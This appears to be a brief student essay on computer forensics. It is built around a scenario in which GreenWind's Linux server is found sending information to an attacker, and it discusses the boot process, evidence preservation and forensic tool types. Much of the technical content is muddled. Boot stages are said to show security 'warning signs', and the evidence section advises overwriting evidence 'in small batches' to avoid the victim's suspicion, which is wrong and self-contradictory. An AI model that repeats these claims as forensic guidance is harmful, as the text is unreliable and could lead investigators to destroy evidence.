Computer Crime Activities
As the increase in the role of computers in the modern world, so do computer crime activities have increased. Criminals have managed to use computers in committing crimes such as hacking information. On the other hand, FBI and police have developed system on dealing with criminal activities. In this case, investigation revolves around a Linux server attack where Linux boot process fails. Due to the day to day technology development, GreenWind develops integration of small wind turbines. Linux server is used in the integration process to conduct required research. During the search process, Linux server was shut down for a while to pave the way for maintenance and later rebooted. It was during rebooting process where programmer of machine noticed something suspicious on some programs that were sending information to an attacker, (Broucek & Turner, 2001).
Linux boot process has several steps that help in developing investigation of rogue security program. At the start (reboot) of a computer, there are warnings that help investigator to look on the said program. When the start button is pressed, the computer develops some warning signs that give information on security measures. This is the high time investigators look at criminal information that helps in developing investigation. Investigators are forced to trace and evaluate IP address of incriminating computer. During Kernel Linux boot process, investigators get a clue on rogue program simply because there some kernel program executed that provide relevant information. Drivers present in temporary root file system aids in gathering information simply because the way the entire system is mounted helps in accessing information in all parts of the system. At runlevel stage, programs are run and executed where investigators can get a clue on rogue programs that send back important information to attackers, (Broucek & Turner, 2001).
In any kind of investigation, evidence should be preserved in order to provide valid information in the court of law. One of the main steps in preserving and protecting evidence from being violated is by transferring and transporting evidence equipment in the right manner. The best way of storing information in such a situation is to have storing materials that do not develop unfavorable conditions that may affect equipment that has evidence. Data should be collected and preserved in a way that it does not be violated by third party. In order to achieve this, all computer connections should be disconnected so as to stop any form of information violation that may develop. By stopping computer connection, it becomes much easier to preserve relevant information about the case. Victim’s computer may be connected to another computer so as to record information for further investigation. Overwriting of evidence should be carried in small batches so as to prevent suspicion from the victim, (Broucek & Turner, 2001).
There are different forensic tools that would be used in examining evidence for the investigation. In gathering evidence for a given crime, there are two main types of forensics tools that may be used. Hardware forensic tools such as complete computer systems and servers and single purpose components are the core hardware forensic tools. On the other hand software, forensic tools include GUI applications and command line applications among others. Reliability of forensic tool is the core aspect in determining the tool to be used in collecting evidence, (Broucek & Turner, 2001).
Broucek, V. & Turner, T. (2001). “Forensic computing: Developing a conceptual approach for an emerging academic discipline,” in 5th Australian Security Research Symposium